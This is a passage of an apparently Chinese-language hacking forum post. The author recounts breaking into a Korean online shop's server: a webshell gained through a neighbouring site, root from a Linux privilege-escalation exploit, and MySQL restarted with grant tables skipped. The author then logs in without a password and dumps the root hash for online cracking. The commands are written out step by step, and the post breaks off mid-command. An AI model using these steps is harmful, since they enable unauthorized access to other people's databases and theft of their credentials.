看上了韩国某shop的数据库,旁注得到了shell
但是无法跨站,真蛋疼。用linux的EXP提权。
小菜只会用EXP。。。
一路cd到目标网站路径,发现文件多的要死,哪有闲心找他的mysql帐密!时间就是生命
早干完早收工睡觉。
都有root权限了,还不好说。。
首先,root下关掉mysqldaemon
/etc/init.d/mysqldstop
然后跳过授权表
mysqld_safe--skip-grant-tables--skip-networking
(注:参数--skip-grant-tables为跳过授权表;--skip-networking为不监听TCP/IP连接,加上这个参数主要是防止别人连接进来,也可以不加。)
然后就是无密码登陆mysql了~
mysql-uroot
登陆成功了,查看mysql的root哈希
select*frommysql.user;
复制mysql的root哈希,丢到cmd5,破解中。。。
也不好直接更改mysql的root密码,怕管理员跨国来找我麻烦。
safe模式下的权限已经够用的了
showdatabases;
use |
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡